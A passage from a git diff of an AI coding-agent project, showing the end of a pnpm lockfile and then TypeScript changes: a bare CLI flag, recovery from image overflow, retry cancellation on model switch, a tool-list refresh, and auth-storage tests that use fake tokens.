sha512-JSWRMozjFKsGlEjiiKajUjIJVKuKdE3oVy2DNtK+fUo8q82nhFZ2CPQwicAIkXrofahDXrWJ7mjelvZphMS98Q==} - - '@types/emscripten@1.41.5': - resolution: {integrity: sha512-cMQm7pxu6BxtHyqJ7mQZ2kXWV5SLmugybFdHCBbJ5eHzOo6VhBckEgAT3//rP5FwPHNPeEiq4SmQ5ucBwsOo4Q==} - - '@types/hosted-git-info@3.0.5': - resolution: {integrity: sha512-Dmngh7U003cOHPhKGyA7LWqrnvcTyILNgNPmNCxlx7j8MIi54iBliiT8XqVLIQ3GchoOjVAyBzNJVyuaJjqokg==} - - '@types/node@25.5.0': - resolution: {integrity: sha512-jp2P3tQMSxWugkCUKLRPVUpGaL5MVFwF8RDuSRztfwgN1wmqJeMSbKlnEtQqU8UrhTmzEmZdu2I6v2dpp7XIxw==} - - '@types/proper-lockfile@4.1.4': - resolution: {integrity: sha512-uo2ABllncSqg9F1D4nugVl9v93RmjxF6LJzQLMLDdPaXCUIDPeOJ21Gbqi43xNKzBi/WQ0Q0dICqufzQbMjipQ==} - - '@types/retry@0.12.5': - resolution: {integrity: sha512-3xSjTp3v03X/lSQLkczaN9UIEwJMoMCA1+Nb5HfbJEQWogdeQIyVtTvxPXDQjZ5zws8rFQfVfRdz03ARihPJgw==} - - '@types/sql.js@1.4.9': - resolution: {integrity: sha512-ep8b36RKHlgWPqjNG9ToUrPiwkhwh0AEzy883mO5Xnd+cL6VBH1EvSjBAAuxLUFF2Vn/moE3Me6v9E1Lo+48GQ==} - - '@types/yauzl@2.10.3': - resolution: {integrity: sha512-oJoftv0LSuaDZE3Le4DbKX+KS9G36NzOeSap90UIK0yMA/NhKJhqlSGtNDORNRaIbQfzjXDrQa0ytJ6mNRGz/Q==} - - ansi-regex@6.2.2: - resolution: {integrity: sha512-Bq3SmSpyFHaWjPk8If9yc6svM8c56dB5BAtW4Qbw5jHTwwXXcTLoRMkpDJp6VL0XzlWaCHTXrkFURMYmD0sLqg==} - engines: {node: '>=12'} - - balanced-match@4.0.4: - resolution: {integrity: sha512-BLrgEcRTwX2o6gGxGOCNyMvGSp35YofuYzw9h1IMTRmKqttAZZVU67bdb9Pr2vUHA8+j3i2tJfjO6C6+4myGTA==} - engines: {node: 18 || 20 || >=22} - - brace-expansion@5.0.4: - resolution: {integrity: sha512-h+DEnpVvxmfVefa4jFbCf5HdH5YMDXRsmKflpf1pILZWRFlTbJpxeU55nJl4Smt5HQaGzg1o6RHFPJaOqnmBDg==} - engines: {node: 18 || 20 || >=22} - - buffer-crc32@0.2.13: - resolution: {integrity: sha512-VO9Ht/+p3SN7SKWqcrgEzjGbRSJYTx+Q1pTQC0wrWqHx0vpJraQ6GtHx8tvcg1rlK1byhU5gccxgOgj7B0TDkQ==} - - chalk@5.6.2: - resolution: {integrity: sha512-7NzBL0rN6fMUW+f7A6Io4h40qQlG+xGmtMxfbnH/K7TAtt8JQWVQK+6g0UXKMeVJoyV5EkkNsErQ8pVD3bLHbA==} - engines: {node: ^12.17.0 || ^14.13 || >=16.0.0} - - debug@4.4.3: - resolution: {integrity: sha512-RGwwWnwQvkVfavKVt22FGLw+xYSdzARwm0ru6DhTVA3umU5hZc28V3kO4stgYryrTlLpuvgI9GiijltAjNbcqA==} - engines: {node: '>=6.0'} - peerDependencies: - supports-color: '*' - peerDependenciesMeta: - supports-color: - optional: true - - diff@8.0.3: - resolution: {integrity: sha512-qejHi7bcSD4hQAZE0tNAawRK1ZtafHDmMTMkrrIGgSLl7hTnQHmKCeB45xAcbfTqK2zowkM3j3bHt/4b/ARbYQ==} - engines: {node: '>=0.3.1'} - - end-of-stream@1.4.5: - resolution: {integrity: sha512-ooEGc6HP26xXq/N+GCGOT0JKCLDGrq2bQUZrQ7gyrJiZANJ/8YDTxTpQBXGMn+WbIQXNVpyWymm7KYVICQnyOg==} - - extract-zip@2.0.1: - resolution: {integrity: sha512-GDhU9ntwuKyGXdZBUgTIe+vXnWj0fppUEtMDL0+idd5Sta8TGpHssn/eusA9mrPr9qNDym6SxAYZjNvCn/9RBg==} - engines: {node: '>= 10.17.0'} - hasBin: true - - fd-slicer@1.1.0: - resolution: {integrity: sha512-cE1qsB/VwyQozZ+q1dGxR8LBYNZeofhEdUNGSMbQD3Gw2lAzX9Zb3uIU6Ebc/Fmyjo9AWWfnn0AUCHqtevs/8g==} - - file-type@21.3.2: - resolution: {integrity: sha512-DLkUvGwep3poOV2wpzbHCOnSKGk1LzyXTv+aHFgN2VFl96wnp8YA9YjO2qPzg5PuL8q/SW9Pdi6WTkYOIh995w==} - engines: {node: '>=20'} - - get-stream@5.2.0: - resolution: {integrity: sha512-nBF+F1rAZVCu/p7rjzgA+Yb4lfYXrpl7a6VmJrU8wF9I1CKvP/QwPNZHnOlwbTkY6dvtFIzFMSyQXbLoTQPRpA==} - engines: {node: '>=8'} - - glob@13.0.6: - resolution: {integrity: sha512-Wjlyrolmm8uDpm/ogGyXZXb1Z+Ca2B8NbJwqBVg0axK9GbBeoS7yGV6vjXnYdGm6X53iehEuxxbyiKp8QmN4Vw==} - engines: {node: 18 || 20 || >=22} - - graceful-fs@4.2.11: - resolution: {integrity: sha512-RbJ5/jmFcNNCcDV5o9eTnBLJ/HszWV0P73bc+Ff4nS/rJj+YaS6IGyiOL0VoBYX+l1Wrl3k63h/KrH+nhJ0XvQ==} - - hosted-git-info@9.0.2: - resolution: {integrity: sha512-M422h7o/BR3rmCQ8UHi7cyyMqKltdP9Uo+J2fXK+RSAY+wTcKOIRyhTuKv4qn+DJf3g+PL890AzId5KZpX+CBg==} - engines: {node: ^20.17.0 || >=22.9.0} - - ieee754@1.2.1: - resolution: {integrity: sha512-dcyqhDvX1C46lXZcVqCpK+FtMRQVdIMN6/Df5js2zouUsqG7I6sFxitIC+7KYK29KdXOLHdu9zL4sFnoVQnqaA==} - - ignore@7.0.5: - resolution: {integrity: sha512-Hs59xBNfUIunMFgWAbGX5cq6893IbWg4KnrjbYwX3tx0ztorVgTDA6B2sxf8ejHJ4wz8BqGUMYlnzNBer5NvGg==} - engines: {node: '>= 4'} - - lru-cache@11.2.7: - resolution: {integrity: sha512-aY/R+aEsRelme17KGQa/1ZSIpLpNYYrhcrepKTZgE+W3WM16YMCaPwOHLHsmopZHELU0Ojin1lPVxKR0MihncA==} - engines: {node: 20 || >=22} - - marked@15.0.12: - resolution: {integrity: sha512-8dD6FusOQSrpv9Z1rdNMdlSgQOIP880DHqnohobOmYLElGEqAL/JvxvuxZO16r4HtjTlfPRDC1hbvxC9dPN2nA==} - engines: {node: '>= 18'} - hasBin: true - - minimatch@10.2.4: - resolution: {integrity: sha512-oRjTw/97aTBN0RHbYCdtF1MQfvusSIBQM0IZEgzl6426+8jSC0nF1a/GmnVLpfB9yyr6g6FTqWqiZVbxrtaCIg==} - engines: {node: 18 || 20 || >=22} - - minipass@7.1.3: - resolution: {integrity: sha512-tEBHqDnIoM/1rXME1zgka9g6Q2lcoCkxHLuc7ODJ5BxbP5d4c2Z5cGgtXAku59200Cx7diuHTOYfSBD8n6mm8A==} - engines: {node: '>=16 || 14 >=14.17'} - - ms@2.1.3: - resolution: {integrity: sha512-6FlzubTLZG3J2a/NVCAleEhjzq5oxgHyaCU9yYXvcLsvoVaHJq/s5xXI6/XXP6tz7R9xAOtHnSO/tXtF3WRTlA==} - - once@1.4.0: - resolution: {integrity: sha512-lNaJgI+2Q5URQBkccEKHTQOPaXdUxnZZElQTZY0MFUAuaEqe1E+Nyvgdz/aIyNi6Z9MzO5dv1H8n58/GELp3+w==} - - path-scurry@2.0.2: - resolution: {integrity: sha512-3O/iVVsJAPsOnpwWIeD+d6z/7PmqApyQePUtCndjatj/9I5LylHvt5qluFaBT3I5h3r1ejfR056c+FCv+NnNXg==} - engines: {node: 18 || 20 || >=22} - - pend@1.2.0: - resolution: {integrity: sha512-F3asv42UuXchdzt+xXqfW1OGlVBe+mxa2mqI0pg5yAHZPvFmY3Y6drSf/GQ1A86WgWEN9Kzh/WrgKa6iGcHXLg==} - - proper-lockfile@4.1.2: - resolution: {integrity: sha512-TjNPblN4BwAWMXU8s9AEz4JmQxnD1NNL7bNOY/AKUzyamc379FWASUhc/K1pL2noVb+XmZKLL68cjzLsiOAMaA==} - - pump@3.0.4: - resolution: {integrity: sha512-VS7sjc6KR7e1ukRFhQSY5LM2uBWAUPiOPa/A3mkKmiMwSmRFUITt0xuj+/lesgnCv+dPIEYlkzrcyXgquIHMcA==} - - retry@0.12.0: - resolution: {integrity: sha512-9LkiTwjUh6rT555DtE9rTX+BKByPfrMzEAtnlEtdEwr3Nkffwiihqe2bWADg+OQRjt9gl6ICdmB/ZFDCGAtSow==} - engines: {node: '>= 4'} - - signal-exit@3.0.7: - resolution: {integrity: sha512-wnD2ZE+l+SPC/uoS0vXeE9L1+0wuaMqKlfz9AMUo38JsyLSBWSFcHR1Rri62LZc12vLr1gb3jl7iwQhgwpAbGQ==} - - sql.js@1.14.1: - resolution: {integrity: sha512-gcj8zBWU5cFsi9WUP+4bFNXAyF1iRpA3LLyS/DP5xlrNzGmPIizUeBggKa8DbDwdqaKwUcTEnChtd2grWo/x/A==} - - std-env@3.10.0: - resolution: {integrity: sha512-5GS12FdOZNliM5mAOxFRg7Ir0pWz8MdpYm6AY6VPkGpbA7ZzmbzNcBJQ0GPvvyWgcY7QAhCgf9Uy89I03faLkg==} - - strip-ansi@7.2.0: - resolution: {integrity: sha512-yDPMNjp4WyfYBkHnjIRLfca1i6KMyGCtsVgoKe/z1+6vukgaENdgGBZt+ZmKPc4gavvEZ5OgHfHdrazhgNyG7w==} - engines: {node: '>=12'} - - strtok3@10.3.4: - resolution: {integrity: sha512-KIy5nylvC5le1OdaaoCJ07L+8iQzJHGH6pWDuzS+d07Cu7n1MZ2x26P8ZKIWfbK02+XIL8Mp4RkWeqdUCrDMfg==} - engines: {node: '>=18'} - - token-types@6.1.2: - resolution: {integrity: sha512-dRXchy+C0IgK8WPC6xvCHFRIWYUbqqdEIKPaKo/AcTUNzwLTK6AH7RjdLWsEZcAN/TBdtfUw3PYEgPr5VPr6ww==} - engines: {node: '>=14.16'} - - uint8array-extras@1.5.0: - resolution: {integrity: sha512-rvKSBiC5zqCCiDZ9kAOszZcDvdAHwwIKJG33Ykj43OKcWsnmcBRL09YTU4nOeHZ8Y2a7l1MgTd08SBe9A8Qj6A==} - engines: {node: '>=18'} - - undici-types@7.18.2: - resolution: {integrity: sha512-AsuCzffGHJybSaRrmr5eHr81mwJU3kjw6M+uprWvCXiNeN9SOGwQ3Jn8jb8m3Z6izVgknn1R0FTCEAP2QrLY/w==} - - undici@7.24.4: - resolution: {integrity: sha512-BM/JzwwaRXxrLdElV2Uo6cTLEjhSb3WXboncJamZ15NgUURmvlXvxa6xkwIOILIjPNo9i8ku136ZvWV0Uly8+w==} - engines: {node: '>=20.18.1'} - - wrappy@1.0.2: - resolution: {integrity: sha512-l4Sp/DRseor9wL6EvV2+TuQn63dMkPjZ/sp9XkghTEbV9KlPS1xUsZ3u7/IQO4wxtcFB4bgpQPRcR3QCvezPcQ==} - - yaml@2.8.2: - resolution: {integrity: sha512-mplynKqc1C2hTVYxd0PU2xQAc22TI1vShAYGksCCfxbn/dFwnHTNi1bvYsBTkhdUNtGIf5xNOg938rrSSYvS9A==} - engines: {node: '>= 14.6'} - hasBin: true - - yauzl@2.10.0: - resolution: {integrity: sha512-p4a9I6X6nu6IhoGmBqAcbJy1mlC4j27vEPZX9F4L4/vZT3Lyq1VkFHw/V/PUcB9Buo+DG3iHkT0x3Qya58zc3g==} - - yoctocolors@2.1.2: - resolution: {integrity: sha512-CzhO+pFNo8ajLM2d2IW/R93ipy99LWjtwblvC1RsoSUMZgyLbYFr221TnSNT7GjGdYui6P459mw9JH/g/zW2ug==} - engines: {node: '>=18'} - -snapshots: - - '@borewit/text-codec@0.2.2': {} - - '@mariozechner/jiti@2.6.5': - dependencies: - std-env: 3.10.0 - yoctocolors: 2.1.2 - - '@silvia-odwyer/photon-node@0.3.4': {} - - '@tokenizer/inflate@0.4.1': - dependencies: - debug: 4.4.3 - token-types: 6.1.2 - transitivePeerDependencies: - - supports-color - - '@tokenizer/token@0.3.0': {} - - '@types/diff@7.0.2': {} - - '@types/emscripten@1.41.5': {} - - '@types/hosted-git-info@3.0.5': {} - - '@types/node@25.5.0': - dependencies: - undici-types: 7.18.2 - - '@types/proper-lockfile@4.1.4': - dependencies: - '@types/retry': 0.12.5 - - '@types/retry@0.12.5': {} - - '@types/sql.js@1.4.9': - dependencies: - '@types/emscripten': 1.41.5 - '@types/node': 25.5.0 - - '@types/yauzl@2.10.3': - dependencies: - '@types/node': 25.5.0 - optional: true - - ansi-regex@6.2.2: {} - - balanced-match@4.0.4: {} - - brace-expansion@5.0.4: - dependencies: - balanced-match: 4.0.4 - - buffer-crc32@0.2.13: {} - - chalk@5.6.2: {} - - debug@4.4.3: - dependencies: - ms: 2.1.3 - - diff@8.0.3: {} - - end-of-stream@1.4.5: - dependencies: - once: 1.4.0 - - extract-zip@2.0.1: - dependencies: - debug: 4.4.3 - get-stream: 5.2.0 - yauzl: 2.10.0 - optionalDependencies: - '@types/yauzl': 2.10.3 - transitivePeerDependencies: - - supports-color - - fd-slicer@1.1.0: - dependencies: - pend: 1.2.0 - - file-type@21.3.2: - dependencies: - '@tokenizer/inflate': 0.4.1 - strtok3: 10.3.4 - token-types: 6.1.2 - uint8array-extras: 1.5.0 - transitivePeerDependencies: - - supports-color - - get-stream@5.2.0: - dependencies: - pump: 3.0.4 - - glob@13.0.6: - dependencies: - minimatch: 10.2.4 - minipass: 7.1.3 - path-scurry: 2.0.2 - - graceful-fs@4.2.11: {} - - hosted-git-info@9.0.2: - dependencies: - lru-cache: 11.2.7 - - ieee754@1.2.1: {} - - ignore@7.0.5: {} - - lru-cache@11.2.7: {} - - marked@15.0.12: {} - - minimatch@10.2.4: - dependencies: - brace-expansion: 5.0.4 - - minipass@7.1.3: {} - - ms@2.1.3: {} - - once@1.4.0: - dependencies: - wrappy: 1.0.2 - - path-scurry@2.0.2: - dependencies: - lru-cache: 11.2.7 - minipass: 7.1.3 - - pend@1.2.0: {} - - proper-lockfile@4.1.2: - dependencies: - graceful-fs: 4.2.11 - retry: 0.12.0 - signal-exit: 3.0.7 - - pump@3.0.4: - dependencies: - end-of-stream: 1.4.5 - once: 1.4.0 - - retry@0.12.0: {} - - signal-exit@3.0.7: {} - - sql.js@1.14.1: {} - - std-env@3.10.0: {} - - strip-ansi@7.2.0: - dependencies: - ansi-regex: 6.2.2 - - strtok3@10.3.4: - dependencies: - '@tokenizer/token': 0.3.0 - - token-types@6.1.2: - dependencies: - '@borewit/text-codec': 0.2.2 - '@tokenizer/token': 0.3.0 - ieee754: 1.2.1 - - uint8array-extras@1.5.0: {} - - undici-types@7.18.2: {} - - undici@7.24.4: {} - - wrappy@1.0.2: {} - - yaml@2.8.2: {} - - yauzl@2.10.0: - dependencies: - buffer-crc32: 0.2.13 - fd-slicer: 1.1.0 - - yoctocolors@2.1.2: {} diff --git a/packages/pi-coding-agent/src/cli/args.ts b/packages/pi-coding-agent/src/cli/args.ts index 101e67da5..cd056d5d8 100644 --- a/packages/pi-coding-agent/src/cli/args.ts +++ b/packages/pi-coding-agent/src/cli/args.ts @@ -49,6 +49,8 @@ export interface Args { fileArgs: string[]; /** Unknown flags (potentially extension flags) - map of flag name to value */ unknownFlags: Map; + /** --bare: suppress CLAUDE.md/AGENTS.md, user skills, prompt templates, themes, project preferences */ + bare?: boolean; } const VALID_THINKING_LEVELS = ["off", "minimal", "low", "medium", "high", "xhigh"] as const; @@ -169,6 +171,8 @@ export function parseArgs(args: string[], extensionFlags?: Map { + const start = source.indexOf("private async _applyModelChange("); + assert.ok(start >= 0, "missing _applyModelChange"); + const window = source.slice(start, start + 900); + const abortIdx = window.indexOf("this._retryHandler.abortRetry();"); + const setModelIdx = window.indexOf("this.agent.setModel(model);"); + + assert.ok(abortIdx >= 0, "_applyModelChange should cancel any in-flight retry"); + assert.ok(setModelIdx >= 0, "_applyModelChange should set the new model"); + assert.ok( + abortIdx < setModelIdx, + "retry cancellation must happen before applying the new model to prevent stale provider retries", + ); +}); diff --git a/packages/pi-coding-agent/src/core/agent-session-tool-refresh.test.ts b/packages/pi-coding-agent/src/core/agent-session-tool-refresh.test.ts new file mode 100644 index 000000000..f1a14a15b --- /dev/null +++ b/packages/pi-coding-agent/src/core/agent-session-tool-refresh.test.ts @@ -0,0 +1,64 @@ +// GSD-2 — Regression tests for #3616: tool list persistence across newSession() calls +// Copyright (c) 2026 Jeremy McSpadden + +import test, { describe } from "node:test"; +import assert from "node:assert/strict"; +import { readFileSync } from "node:fs"; +import { join } from "node:path"; + +const source = readFileSync( + join(process.cwd(), "packages/pi-coding-agent/src/core/agent-session.ts"), + "utf-8", +); + +describe("#3616 — newSession() must restore full tool set", () => { + test("newSession() calls _refreshToolRegistry with includeAllExtensionTools when cwd is unchanged", () => { + // Find the newSession method + const newSessionStart = source.indexOf("async newSession(options?:"); + assert.ok(newSessionStart >= 0, "should find newSession method"); + + // Get the method body (up to the next top-level method) + const methodBody = source.slice(newSessionStart, newSessionStart + 3000); + + // Verify the cwd-changed branch rebuilds tools + assert.ok( + methodBody.includes("if (this._cwd !== previousCwd)"), + "should have cwd-change guard", + ); + + // Verify the else branch exists and refreshes tools with includeAllExtensionTools + const elseIdx = methodBody.indexOf("} else {"); + assert.ok(elseIdx >= 0, "should have else branch for cwd-unchanged case"); + + const elseBranch = methodBody.slice(elseIdx, elseIdx + 800); + assert.ok( + elseBranch.includes("_refreshToolRegistry"), + "else branch should call _refreshToolRegistry", + ); + assert.ok( + elseBranch.includes("includeAllExtensionTools: true"), + "else branch should pass includeAllExtensionTools: true to restore narrowed tools", + ); + }); + + test("newSession() references #3616 in the else-branch comment", () => { + const idx = source.indexOf("#3616"); + assert.ok(idx >= 0, "source should reference issue #3616 for the tool restore fix"); + }); + + test("agent.reset() does not clear _state.tools (tools persist across reset)", () => { + // This is a structural invariant — if reset() starts clearing tools, + // the newSession() refresh becomes the only defense against tool loss. + const agentSource = readFileSync( + join(process.cwd(), "packages/pi-agent-core/src/agent.ts"), + "utf-8", + ); + const resetStart = agentSource.indexOf("reset()"); + assert.ok(resetStart >= 0, "should find reset() method"); + const resetBody = agentSource.slice(resetStart, resetStart + 400); + assert.ok( + !resetBody.includes("tools"), + "reset() should NOT touch _state.tools — tools are managed by agent-session", + ); + }); +}); diff --git a/packages/pi-coding-agent/src/core/agent-session.ts b/packages/pi-coding-agent/src/core/agent-session.ts index 03389954f..782ecd04e 100644 --- a/packages/pi-coding-agent/src/core/agent-session.ts +++ b/packages/pi-coding-agent/src/core/agent-session.ts @@ -72,6 +72,7 @@ import type { ModelRegistry } from "./model-registry.js"; import { expandPromptTemplate, type PromptTemplate } from "./prompt-templates.js"; import type { ResourceExtensionPaths, ResourceLoader } from "./resource-loader.js"; import { RetryHandler } from "./retry-handler.js"; +import { isImageDimensionError, downsizeConversationImages } from "./image-overflow-recovery.js"; import type { BranchSummaryEntry, SessionManager } from "./session-manager.js"; import { getLatestCompactionEntry } from "./session-manager.js"; import type { SettingsManager } from "./settings-manager.js"; @@ -136,7 +137,8 @@ export type AgentSessionEvent = | { type: "auto_retry_end"; success: boolean; attempt: number; finalError?: string } | { type: "fallback_provider_switch"; from: string; to: string; reason: string } | { type: "fallback_provider_restored"; provider: string; reason: string } - | { type: "fallback_chain_exhausted"; reason: string }; + | { type: "fallback_chain_exhausted"; reason: string } + | { type: "image_overflow_recovery"; strippedCount: number; imageCount: number }; /** Listener function for agent session events */ export type AgentSessionEventListener = (event: AgentSessionEvent) => void; @@ -164,6 +166,9 @@ export interface AgentSessionConfig { baseToolsOverride?: Record; /** Mutable ref used by Agent to access the current ExtensionRunner */ extensionRunnerRef?: { current?: ExtensionRunner }; + /** Optional: check if the claude-code CLI provider is ready (installed + authed). + * Passed through to RetryHandler for third-party block recovery (#3772). */ + isClaudeCodeReady?: () => boolean; } export interface ExtensionBindings { @@ -255,6 +260,10 @@ export class AgentSession { private _cumulativeOutputTokens = 0; private _cumulativeToolCalls = 0; + /** Cost of the most recent assistant response (for per-prompt display). */ + private _lastTurnCost = 0; + + // Bash execution state private _bashAbortController: AbortController | undefined = undefined; private _pendingBashMessages: BashExecutionMessage[] = []; @@ -318,6 +327,7 @@ export class AgentSession { getSessionId: () => this.sessionId, emit: (event) => this._emit(event), onModelChange: (model) => this.sessionManager.appendModelChange(model.provider, model.id), + isClaudeCodeReady: config.isClaudeCodeReady, }); this._compactionOrchestrator = new CompactionOrchestrator({ @@ -454,6 +464,7 @@ export class AgentSession { // Accumulate session stats that survive compaction (#1423) const assistantMsg = event.message as AssistantMessage; + this._lastTurnCost = assistantMsg.usage?.cost?.total ?? 0; this._cumulativeCost += assistantMsg.usage?.cost?.total ?? 0; this._cumulativeInputTokens += assistantMsg.usage?.input ?? 0; this._cumulativeOutputTokens += assistantMsg.usage?.output ?? 0; @@ -482,6 +493,36 @@ export class AgentSession { if (didRetry) return; // Retry was initiated, don't proceed to compaction } + // Check for image dimension overflow (many-image 400 error). + // When a session accumulates many images, the API rejects requests + // whose images exceed the many-image dimension limit. Strip older + // images from the conversation and auto-retry. (#2874) + if ( + msg.stopReason === "error" && + isImageDimensionError(msg.errorMessage) + ) { + const messages = this.agent.state.messages; + const result = downsizeConversationImages(messages as Message[]); + if (result.processed) { + // Remove the trailing error assistant message, then replace + if (messages.length > 0 && messages[messages.length - 1].role === "assistant") { + this.agent.replaceMessages(messages.slice(0, -1)); + } + + this._emit({ + type: "image_overflow_recovery", + strippedCount: result.strippedCount, + imageCount: result.imageCount, + }); + + // Auto-retry after downsizing + setTimeout(() => { + this.agent.continue().catch(() => {}); + }, 0); + return; + } + } + await this._compactionOrchestrator.checkCompaction(msg); } } @@ -687,6 +728,8 @@ export class AgentSession { * Call this when completely done with the session. */ dispose(): void { + this._extensionErrorUnsubscriber?.(); + this._extensionErrorUnsubscriber = undefined; this._disconnectFromAgent(); this._eventListeners = []; } @@ -1047,9 +1090,8 @@ export class AgentSession { }); } - // Validate API key - const apiKey = await this._modelRegistry.getApiKey(this.model, this.sessionId); - if (!apiKey) { + // Validate provider readiness + if (!this._modelRegistry.isProviderRequestReady(this.model.provider)) { const isOAuth = this._modelRegistry.isUsingOAuth(this.model); if (isOAuth) { throw new Error( @@ -1539,6 +1581,16 @@ export class AgentSession { activeToolNames: this.getActiveToolNames(), includeAllExtensionTools: true, }); + } else { + // Even when cwd hasn't changed, restore the full tool set (#3616). + // Extensions (e.g., discuss flows) may narrow the active tool list + // via setActiveTools() during a session. Without this refresh, the + // narrowed set persists into the next session — causing tools like + // gsd_plan_slice to be missing from auto-mode subagent sessions. + this._refreshToolRegistry({ + activeToolNames: this.getActiveToolNames(), + includeAllExtensionTools: true, + }); } // Run setup callback if provided (e.g., to append initial messages) @@ -1595,6 +1647,10 @@ export class AgentSession { options?: { persist?: boolean }, ): Promise { const previousModel = this.model; + // Explicit model switches must cancel any in-flight retry loop from the + // previous provider/model. Otherwise stale provider backoff errors can + // continue to land after the user or runtime has already switched models. + this._retryHandler.abortRetry(); this.agent.setModel(model); this.sessionManager.appendModelChange(model.provider, model.id); if (options?.persist !== false) { @@ -1607,12 +1663,11 @@ export class AgentSession { /** * Set model directly. - * Validates API key, saves to session and settings. - * @throws Error if no API key available for the model + * Validates provider readiness, saves to session and settings. + * @throws Error if provider is not ready (missing credentials for apiKey/oauth providers) */ async setModel(model: Model, options?: { persist?: boolean }): Promise { - const apiKey = await this._modelRegistry.getApiKey(model, this.sessionId); - if (!apiKey) { + if (!this._modelRegistry.isProviderRequestReady(model.provider)) { throw new Error(`No API key for ${model.provider}/${model.id}`); } @@ -1633,30 +1688,14 @@ export class AgentSession { return this._cycleAvailableModel(direction, options); } - private async _getScopedModelsWithApiKey(): Promise; thinkingLevel?: ThinkingLevel }>> { - const apiKeysByProvider = new Map(); - const result: Array<{ model: Model; thinkingLevel?: ThinkingLevel }> = []; - - for (const scoped of this._scopedModels) { - const provider = scoped.model.provider; - let apiKey: string | undefined; - if (apiKeysByProvider.has(provider)) { - apiKey = apiKeysByProvider.get(provider); - } else { - apiKey = await this._modelRegistry.getApiKeyForProvider(provider, this.sessionId); - apiKeysByProvider.set(provider, apiKey); - } - - if (apiKey) { - result.push(scoped); - } - } - - return result; + private _getReadyScopedModels(): Array<{ model: Model; thinkingLevel?: ThinkingLevel }> { + return this._scopedModels.filter((scoped) => + this._modelRegistry.isProviderRequestReady(scoped.model.provider), + ); } private async _cycleScopedModel(direction: "forward" | "backward", options?: { persist?: boolean }): Promise { - const scopedModels = await this._getScopedModelsWithApiKey(); + const scopedModels = this._getReadyScopedModels(); if (scopedModels.length <= 1) return undefined; const currentModel = this.model; @@ -1687,11 +1726,6 @@ export class AgentSession { const nextIndex = direction === "forward" ? (currentIndex + 1) % len : (currentIndex - 1 + len) % len; const nextModel = availableModels[nextIndex]; - const apiKey = await this._modelRegistry.getApiKey(nextModel, this.sessionId); - if (!apiKey) { - throw new Error(`No API key for ${nextModel.provider}/${nextModel.id}`); - } - const thinkingLevel = this._getThinkingLevelForModelSwitch(); await this._applyModelChange(nextModel, thinkingLevel, "cycle", options); @@ -1928,7 +1962,11 @@ export class AgentSession { runner.setUIContext(this._extensionUIContext); runner.bindCommandContext(this._extensionCommandContextActions); - this._extensionErrorUnsubscriber?.(); + try { + this._extensionErrorUnsubscriber?.(); + } catch { + // Ignore errors from previous unsubscriber + } this._extensionErrorUnsubscriber = this._extensionErrorListener ? runner.onError(this._extensionErrorListener) : undefined; @@ -1998,6 +2036,11 @@ export class AgentSession { const messages = this.agent.state.messages; const last = messages[messages.length - 1]; if (last?.role === "assistant" && (last as AssistantMessage).stopReason === "error") { + // If the error was an image dimension overflow, downsize images + // before retrying so the retry doesn't hit the same error (#2874) + if (isImageDimensionError((last as AssistantMessage).errorMessage)) { + downsizeConversationImages(messages as Message[]); + } this.agent.replaceMessages(messages.slice(0, -1)); this.agent.continue().catch((err) => { runner.emitError({ @@ -2026,8 +2069,7 @@ export class AgentSession { refreshTools: () => this._refreshToolRegistry(), getCommands, setModel: async (model, options) => { - const key = await this.modelRegistry.getApiKey(model, this.sessionId); - if (!key) return false; + if (!this.modelRegistry.isProviderRequestReady(model.provider)) return false; await this.setModel(model, options); return true; }, @@ -2250,7 +2292,7 @@ export class AgentSession { async executeBash( command: string, onChunk?: (chunk: string) => void, - options?: { excludeFromContext?: boolean; operations?: BashOperations }, + options?: { excludeFromContext?: boolean; operations?: BashOperations; loginShell?: boolean }, ): Promise { this._bashAbortController = new AbortController(); @@ -2267,6 +2309,7 @@ export class AgentSession { : await executeBashCommand(resolvedCommand, { onChunk, signal: this._bashAbortController.signal, + loginShell: options?.loginShell, }); this.recordBashResult(command, result, options); @@ -2597,10 +2640,10 @@ export class AgentSession { let summaryDetails: unknown; if (options.summarize && entriesToSummarize.length > 0 && !extensionSummary) { const model = this.model!; - const apiKey = await this._modelRegistry.getApiKey(model, this.sessionId); - if (!apiKey) { + if (!this._modelRegistry.isProviderRequestReady(model.provider)) { throw new Error(`No API key for ${model.provider}`); } + const apiKey = await this._modelRegistry.getApiKey(model, this.sessionId); const branchSummarySettings = this.settingsManager.getBranchSummarySettings(); const result = await generateBranchSummary(entriesToSummarize, { model, @@ -2774,6 +2817,14 @@ export class AgentSession { }; } + /** + * Get the cost of the most recent assistant response. + * Returns 0 if no assistant message has been received yet. + */ + getLastTurnCost(): number { + return this._lastTurnCost; + } + getContextUsage(): ContextUsage | undefined { const model = this.model; if (!model) return undefined; diff --git a/packages/pi-coding-agent/src/core/auth-storage.test.ts b/packages/pi-coding-agent/src/core/auth-storage.test.ts index f91947ca9..a0d2cab20 100644 --- a/packages/pi-coding-agent/src/core/auth-storage.test.ts +++ b/packages/pi-coding-agent/src/core/auth-storage.test.ts @@ -263,6 +263,152 @@ describe("AuthStorage — areAllCredentialsBackedOff", () => { }); }); +// ─── mismatched oauth credential for non-OAuth provider (#2083) ─────────────── + +describe("AuthStorage — oauth credential for non-OAuth provider (#2083)", () => { + it("returns undefined when openrouter has type:oauth (no registered OAuth provider)", async (t) => { + // Simulates the bug: OpenRouter credential stored as type:"oauth" + // but OpenRouter is not a registered OAuth provider. + const storage = inMemory({ + openrouter: { + type: "oauth", + access_token: "sk-or-v1-fake", + refresh_token: "rt-fake", + expires: Date.now() + 3_600_000, + }, + }); + + // Isolate from any real OPENROUTER_API_KEY in the environment so the + // fall-through to env / fallback finds nothing and returns undefined. + const origEnv = process.env.OPENROUTER_API_KEY; + delete process.env.OPENROUTER_API_KEY; + t.after(() => { + if (origEnv === undefined) { + delete process.env.OPENROUTER_API_KEY; + } else { + process.env.OPENROUTER_API_KEY = origEnv; + } + }); + + // Before the fix, getApiKey returns undefined because + // resolveCredentialApiKey calls getOAuthProvider("openrouter") → null → undefined. + // The key in the oauth credential is never extracted. + const key = await storage.getApiKey("openrouter"); + // After the fix, the oauth credential with an unrecognised provider + // should be skipped, and getApiKey should fall through to env / fallback. + // With no env var and no fallback resolver configured, the result is undefined. + assert.equal(key, undefined); + }); + + it("falls through to env var when openrouter has type:oauth credential", async (t) => { + const storage = inMemory({ + openrouter: { + type: "oauth", + access_token: "sk-or-v1-fake", + refresh_token: "rt-fake", + expires: Date.now() + 3_600_000, + }, + }); + + // Simulate OPENROUTER_API_KEY being set via env + const origEnv = process.env.OPENROUTER_API_KEY; + t.after(() => { + if (origEnv === undefined) { + delete process.env.OPENROUTER_API_KEY; + } else { + process.env.OPENROUTER_API_KEY = origEnv; + } + }); + + process.env.OPENROUTER_API_KEY = 